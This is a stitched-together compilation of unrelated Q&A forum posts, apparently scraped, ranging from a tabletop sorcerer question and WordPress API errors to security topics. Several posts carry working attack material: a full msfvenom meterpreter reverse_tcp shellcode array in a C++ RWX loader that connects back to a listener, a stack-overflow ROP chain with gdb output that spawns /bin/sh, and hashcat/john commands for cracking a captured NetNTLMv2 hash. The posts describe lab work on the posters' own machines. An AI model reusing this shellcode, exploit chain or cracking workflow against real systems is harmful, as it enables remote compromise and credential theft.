As a Sorcerer, given that I can’t multiclass or take feats, how successful can I be at passing concentration checks starting at level 15? [closed]

I’m doing a melee sorcerer, but I’m afraid of losing my concentration in combat because in the higher levels the damage is too big and the concentration check is too difficult.
My campaign doesn’t allow feats and multiclassing, only ASI.
Is the haste spell worth it at higher levels?

Not worth it to cast only to lose it in one round because I was hit and lost concentration – that’s what I mean by "Is it worth it?"

dex- (+2) str- (+2) / int – (0) / wis- (-1) / const (+5)

prof- (+5)

Can’t inject meterpreter shellcode in c++ code

I want to inject meterpreter shellcode into a C++ program.

When I create an .exe file with msfvenom and try it in my virtual machine (Windows 7), it works well, but when I create shellcode and inject it into a C++ file, the program compiles successfully but crashes when I launch it in my VM.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.133 LPORT=4444 -f c -o main2.txt 

Here is my C++ code (compiled in x64 debug mode with Microsoft Visual Studio):

#include <iostream> #include <Windows.h> int main() { char shell[] =      "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"     "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"     "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"     "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"     "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"     "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"     "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"     "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"     "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"     "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"     "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"     "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"     "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"     "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"     "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"     "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"     "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\xd0\x85\x41\x54\x49\x89\xe4"     "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"     "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"     "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"     "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"     "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"     "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"     "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"     "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"     "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"     "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"     "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"     
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"     "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"     "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"     "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"     "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"     "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";  void* exec = VirtualAlloc(0, sizeof shell, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shell, sizeof shell); ((void(*)())exec)();  return 0;  } 

here is the error:

The application was unable to start correctly: c000007b

What is my mistake? Thanks for answers!

ROP execute a shell with execl() – /bin/sh: 0: Can’t open

A C program vulnerable to a stack buffer overflow requires 112 bytes of stuffing to get to the return address of the calling function. Here strcpy() is the vulnerable function.

void f(char *name){
  char buf[100];
  strcpy(buf, name);
}

void main(int argc, char *argv[]){
  f(argv[1]);
}

Trying to write the ROP gadgets to execute a /bin/sh shell by means of execl(). The exploit would be:

python -c 'print 112*"\x90" + "addr. execl()" + "addr. exit()" + "addr. /bin/sh" + "addr. /bin/sh"'   

From gdb these are the found addresses (ASLR disabled for test):

(gdb) print execl
$1 = 0xb7eb7b60 <__GI_execl>
(gdb) print exit
$2 = 0xb7e359e0 <__GI_exit>
(gdb) info proc map
...(output omitted)
(gdb) find 0xb7e07000,0xb7fbb000,"/bin/sh"
0xb7f62b0b
1 pattern found.
(gdb) x/s 0xb7f62b0b
0xb7f62b0b:   "/bin/sh"
(gdb) run $(python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')
Starting program: /home/marco/asm/execve/bypass_aslr/rop/prove/main $(python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')
process 3161 is executing new program: /bin/dash
/bin/sh: 0: Can't open UWVS��������
[Inferior 1 (process 3161) exited with code 0177]

The same test using system() gives the shell.

I don’t understand if the execl() is successful and if it’s replacing the currently running process image.

Platform: Ubuntu 16.04 – 32 bit.

UPDATE: I added some gadgets to the exploit and got back another result. In brief, I added gets() to write the NULL byte as the third argument to pass to execl(). The exploit will write the stack in this order:

addr. exit()
fake byte (NULL will be written here)
addr. /bin/sh
addr. /bin/sh
addr. pop\pop\pop\ret
addr. execl()
addr. where to write NULL byte
addr. pop\ret
addr. gets()        <-- ESP will be here when it is time to return to caller
112 NOP

From gdb I run the exploit, I type "new line" so gets() writes NULL to the provided address, and the result is:

[Inferior 1 (process 2793) exited normally] 

This time no errors, but again no shell.

EDIT2: this is the stack after gets() is executed and before execl().

The commands I used under gdb to capture the stack layout:

(gdb) b 10     --> this is to stop after strcpy() in the .c code
Breakpoint 1 at 0x8048497: file main.c, line 10.
(gdb) run $(python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')
Starting program: /home/marco/rop/main $(python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')
Breakpoint 1, func (name=0xb7e2d06e <__ctype_get_mb_cur_max+30> "X3U0327") at main.c:10
(gdb) b *execl
Breakpoint 2 at 0xb7eb9a80: file execl.c, line 31.
(gdb) c
Continuing.

Breakpoint 2, __GI_execl (path=0xb7f64a0b "/bin/sh", arg=0xb7f64a0b "/bin/sh") at execl.c:31
31    execl.c: File o directory non esistente.
(gdb) x/x $esp
0xbffff5ec:   0xb7ef334f
(gdb) x/x $esp+4
0xbffff5f0:   0xb7f64a0b
(gdb) x/x $esp+8
0xbffff5f4:   0xb7f64a0b
(gdb) x/4x $esp+12
0xbffff5f8:   0x00    0x42    0x42    0x42
(gdb) x/s $esp+12
0xbffff5f8:   ""

Please note, this test was executed from another Ubuntu 16.04, and the addresses are now:

"\xe0\x83\xe6\xb7" +   -> gets()
"\x6e\xd0\xe2\xb7" +   -> pop/ret
"\xf8\xf5\xff\xbf" +   -> address where to write NULL
"\x80\x9a\xeb\xb7" +   -> execl()
"\x4f\x33\xef\xb7" +   -> pop/pop/pop/ret
"\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh
"\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh
"\x42\x42\x42\x42" +   -> fake address to be overwritten
"\xd0\x79\xe3\xb7"     -> exit()
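
A bounded counterpart of the f() shown in the question above, as an added example that is not part of the original post: it refuses any argument that does not fit the 100-byte buffer instead of copying it. The names copy_name, f_hardened and NAME_BUF are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define NAME_BUF 100 /* same size as buf[] in the question's f() */

/* Hypothetical helper: copy name into dst only if it fits, terminator
 * included. Returns 0 on success, -1 if the input was rejected. */
int copy_name(char *dst, size_t dst_size, const char *name)
{
    if (dst == NULL || dst_size == 0 || name == NULL)
        return -1;
    /* memchr stops at the first NUL, so at most dst_size bytes are examined */
    const char *end = memchr(name, '\0', dst_size);
    if (end == NULL) {
        dst[0] = '\0'; /* too long: leave an empty string, not a partial copy */
        return -1;
    }
    memcpy(dst, name, (size_t)(end - name) + 1);
    return 0;
}

/* Bounded counterpart of f(): oversized input is refused instead of being
 * copied past buf[] toward the saved return address. */
int f_hardened(const char *name)
{
    char buf[NAME_BUF];
    return copy_name(buf, sizeof buf, name);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s name\n", argv[0]);
        return 2;
    }
    if (f_hardened(argv[1]) != 0) {
        fprintf(stderr, "name rejected: longer than %d bytes\n", NAME_BUF - 1);
        return 1;
    }
    return 0;
}
```

The boundary is the point to check: 99 characters plus the terminator fit, 100 characters do not.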

Can’t use /wp-json/wp/v2/plugins API endpoint even as administrator

Using Basic Authentication as an Administrator, I am getting an error code 401 Unauthorized : [rest_cannot_view_plugins] Sorry, you are not allowed to manage plugins for this site. error when I attempt to access the GET /wp-json/wp/v2/plugins endpoint of my server. I can pull Post and Page info with no problem, but when I query against the plugins, I’m getting the 401 error. I’ve confirmed that the userid used in the API call should be able to manage plugins using the CLI tool:

# wp user list-caps $USER | grep plugin
activate_plugins
edit_plugins
update_plugins
delete_plugins
install_plugins

Any pointers would be appreciated.

Why can’t we compile 8086 Assembly for all OSs from any OS?

If Mac OS, Linux, and Windows (mostly) all use Intel’s 8086 64 bit instruction set, why can’t we compile 8086 64 assembly from any operating system to any other operating system? (e.g. compile a Mac OS executable from assembly in Windows). Surely it would just be a matter of knowing what the machine code is for any given instruction?

I can’t use the wifi because of permission issues [closed]

I wasn’t able to create an account other than root for a while, then I learned how to do it in the terminal. I made the non-root account, and I noticed that it doesn’t have the content that the root user has, and it isn’t even the administrator. I went back to the root account (I’m 99.9% sure I still had wireless connection), and made the account an administrator. After that I went to the main storage, and changed the permissions of the main storage (computer) as a whole. Then I went back to the normal account and noticed that I didn’t have the option of wireless connection anymore, and neither do I on root (I have the driver installed still, and it worked perfectly before). What could I do to bring wifi back? Your help would be much appreciated!

Can’t open hash with John or Hashcat

I’m trying to open a hash with John and HashCat, but both don’t work?

NTLMv2 Response Captured from 192.168.1.1
DOMAIN: DEV29-APP01 USER: testuser
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:3045e74dac0653865d353e93e8c5ca8c NT_CLIENT_CHALLENGE:

Manually rewritten to:

testuser::DEV29-APP01:3045e74dac0653865d353e93e8c5ca8c:0101000000000000c2af33072879d60195da2f228ded77b7000000000200120041004e004f004e0059004d004f00550053000100120041004e004f004e0059004d004f00550053000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f00750073000800300030000000000000000000000000200000feb33cee8c0f22d8b27a15278ee7fdfbb47b23655ada87d2da7b3a3b1db5450e0a00100000000000000000000000000000000000090038004d005300530051004c005300760063002f003100360038002e00360033002e003100310031002e003100300036003a0031003400330033000000000000000000

me>hashcat -m 5600 -a 3 testuser.txt --force
Hashfile 'testuser.txt' on line 1 (testus...31003400330033000000000000000000): Separator unmatched
No hashes loaded.

me>john --format=netntlmv2 testuser.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
me>john --show --format=netntlmv2 testuser.txt
0 password hashes cracked, 0 left

What am I missing?
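
A field-layout check for the six-field line that hashcat documents for mode 5600 (`user::domain:server_challenge:NTProofStr:blob`), as an added example that is not part of the original post. The function name, return codes and sample lines are constructed for illustration; a line with no 16-hex-digit server challenge has only five fields and is rejected.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum { LINE_OK, BAD_FIELD_COUNT, BAD_USER_FIELDS, BAD_SERVER_CHALLENGE,
       BAD_NTPROOFSTR, BAD_BLOB };

/* Constructed sample lines (not values from the page). */
static const char SAMPLE_OK[] =
    "alice::LAB:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000";
static const char SAMPLE_NO_CHALLENGE[] = /* server challenge field absent */
    "alice::LAB:00112233445566778899aabbccddeeff:0101000000000000";

static int is_hex(const char *s, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (!isxdigit((unsigned char)s[i])) return 0;
    return 1;
}

/* Hypothetical checker: returns LINE_OK or the first layout problem found. */
int check_netntlmv2_line(const char *line)
{
    const char *field[6];
    size_t len[6];
    int n = 0;

    for (const char *p = line;; p++) { /* split on ':' up to end of line */
        if (n == 6) return BAD_FIELD_COUNT; /* a seventh field started */
        field[n] = p;
        len[n] = strcspn(p, ":\r\n");
        p += len[n++];
        if (*p != ':') break;
    }
    if (n != 6) return BAD_FIELD_COUNT;
    if (len[0] == 0 || len[1] != 0) return BAD_USER_FIELDS; /* "user::" */
    /* 8-byte challenge = 16 hex digits; 16-byte NTProofStr = 32 hex digits */
    if (len[3] != 16 || !is_hex(field[3], 16)) return BAD_SERVER_CHALLENGE;
    if (len[4] != 32 || !is_hex(field[4], 32)) return BAD_NTPROOFSTR;
    if (len[5] == 0 || len[5] % 2 || !is_hex(field[5], len[5])) return BAD_BLOB;
    return LINE_OK;
}

int main(void)
{
    printf("ok=%d no_challenge=%d\n", check_netntlmv2_line(SAMPLE_OK),
           check_netntlmv2_line(SAMPLE_NO_CHALLENGE));
    return 0;
}
```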